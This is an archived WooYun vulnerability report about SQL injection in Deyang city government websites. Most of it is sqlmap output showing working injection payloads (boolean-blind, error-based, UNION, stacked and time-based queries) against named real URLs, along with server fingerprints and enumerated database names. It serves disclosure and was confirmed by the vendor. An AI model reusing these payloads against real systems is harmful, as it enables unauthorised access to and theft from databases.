乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-29: 细节已通知厂商并且等待厂商处理中 2014-09-30: 厂商已经确认,细节仅向厂商公开 2014-10-10: 细节向核心白帽子及相关领域专家公开 2014-10-20: 细节向普通白帽子公开 2014-10-30: 细节向实习白帽子公开 2014-11-13: 细节向公众公开
http://www1.deyang.gov.cn/fgw-new/TopicOneListPage.aspx?TopicID=1
[*] starting at 20:04:40[20:04:41] [INFO] resuming back-end DBMS 'microsoft sql server'[20:04:41] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: TopicID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: TopicID=1 AND 7794=7794 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TopicID=1 AND 7184=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(107)+CHAR(99)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: TopicID=1 UNION ALL SELECT NULL, CHAR(58)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(58)+CHAR(111)+CHAR(90)+CHAR(98)+CHAR(71)+CHAR(66)+CHAR(70)+CHAR(98)+CHAR(70)+CHAR(85)+CHAR(112)+CHAR(58)+CHAR(112)+CHAR(107)+CHAR(99)+CHAR(58), NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TopicID=1; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TopicID=1 WAITFOR DELAY '0:0:5'-----[20:04:41] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[20:04:41] [INFO] fetching database names[20:04:41] [WARNING] reflective value(s) found and filtering outavailable databases [9]:[*] DYFGWDB[*] DYFood-DY[*] jyxcb[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
Database: master[5 tables]+----------------------+| dbo.spt_fallback_db || dbo.spt_fallback_dev || dbo.spt_fallback_usg || dbo.spt_monitor || dbo.spt_values |+----------------------+
http://www.deyang.gov.cn/dy_gk_show.asp?id=37670
[*] starting at 20:31:40[20:31:40] [INFO] resuming back-end DBMS 'microsoft sql server'[20:31:40] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=37670; WAITFOR DELAY '0:0:5';-----[20:31:40] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008
还有http://www.deyang.gov.cn/showszxx.asp?id=42560http://www1.deyang.gov.cn/dysrfb/sp/cdshow.aspx?cd_id=17
顺便求个证书
危害等级:高
漏洞Rank:12
确认时间:2014-09-30 09:59
暂无